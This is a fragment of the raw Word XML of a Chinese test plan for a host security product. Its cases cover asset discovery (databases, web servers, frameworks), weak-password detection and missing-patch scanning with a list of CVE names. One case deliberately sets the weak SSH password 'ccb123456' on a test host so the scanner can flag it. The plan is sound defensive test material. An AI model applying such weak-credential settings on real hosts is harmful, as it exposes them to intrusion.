              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号的是否root权限显示为：否</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号上次登录时间为步骤2操作时的时间</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属用户组为test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号密码过期时间为测试日期往后推的500天</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号上次修改密码的时间为步骤1操作的时间</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26" w:name="_Toc1009249315"/>
      <w:bookmarkStart w:id="27" w:name="_Toc15352"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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数据库信息采集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cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>能够识别出主机上安装的数据库软件，包括Mysql、Oracle等，并且识别出其安装路径、端口、版本、运行用户等。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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>找到数据库模块并点击进入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能够识别出所有主机上安装的数据库软件，包括Mysql、Oracle，</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—版本：</w:t>
            </w:r>
            <w:r>
              <w:t>5.5.20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/home/db</w:t>
            </w:r>
            <w:r>
              <w:t>/mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Oracle—版本：19.3.0.0.0；</w:t>
            </w:r>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/opt/oracle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bookmarkEnd w:id="25"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc21236"/>
      <w:bookmarkStart w:id="29" w:name="_Toc1627393199"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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Web服务采集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能够识别出主机上安装的Web服务，包括Apache、weblogic等，并识别出其版本、安装路径信息、启动文件路径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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w:t>ent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机预先安装Apache、weblogic等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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的web容器功能，即可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能够识别出所有主机上安装的Web服务，包括Apache、weblogic</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pache:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Oracle-76-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/httpd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>2.4.38</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—/home/soft/httpd/bin/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Redhat-67-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>10.0.3.6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/Oracle/Middleware/user_projects/domains/base_domain/bin/startWebLogic.sh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30" w:name="_Toc1245767401"/>
      <w:bookmarkStart w:id="31" w:name="_Toc25706"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web框架</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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Web框架采集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cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>能够识别出所有Web站点中使用的框架，并且识别出框架版本、使用该web框架的web应用的路径等信息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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的web框架功能，即可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能够识别出所有Web站点中使用的框架</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Struts2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：2.5.12</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径：/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：4.1.9</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Fastjson</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：1.2.37</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/home/soft/tomcat/webapps/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32" w:name="_Toc1794634004"/>
      <w:bookmarkStart w:id="33" w:name="_Toc2999"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱口令检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>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弱口令检查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t>测试产品是否具有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统及应用</w:t>
            </w:r>
            <w:r>
              <w:t>弱口令检查功能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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端对弱口令库新增ccb123456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1"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17"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试主机上设置弱密码</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：Oracle-76-01上执行passwd ccb 根据提示修改ssh密码为ccb123456</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端，对主机进行弱口令检查</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等待扫描结束，查看结果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能够检查出主机上部署软件所存在的弱口令，在服务端能看到Oracle-76-01上ccb用户的ssh弱口令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34" w:name="_Toc9716"/>
      <w:bookmarkStart w:id="35" w:name="_Toc1005883113"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统安全补丁检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>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05" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持识别出现有系统中所缺失的安全补丁。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305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检查主机安全产品能否识别出主机上未安装的补丁，以及补丁的风险描述、验证信息、修复建议、漏洞利用原理、所影响业务、修复漏洞是否需要重启等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05" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机存在缺失的安全补丁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05" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w: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05" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端，对Oracle-76-01进行系统安全补丁扫描检查</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等待扫描结束，查看结果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0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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够识别出识别出现有系统中所缺失的安全补丁，</w:t>
            </w:r>
            <w:r>
              <w:t>如以下漏洞中的任意两个</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-11811 Linux kernel 资源管理错误漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-14287 Sudo 安全漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-3862 libssh2 缓冲区错误漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2018-15686 systemd 安全漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-9948 Python 安全特征问题漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-6974 Linux kernel 竞争条件问题漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-1559 OpenSSL 信息泄露漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-11745 多款Mozilla产品缓冲区错误漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-1125 Intel x86-64和AMD Microprocessors 信息泄露漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2018-15688 systemd dhcp6客户端缓冲区错误漏洞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30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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试工具：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767"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0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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试记录：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767"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0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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试结果：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767"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0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宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7767"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05"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767"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36" w:name="_Toc886211007"/>
      <w:bookmarkStart w:id="37" w:name="_Toc32068"/>
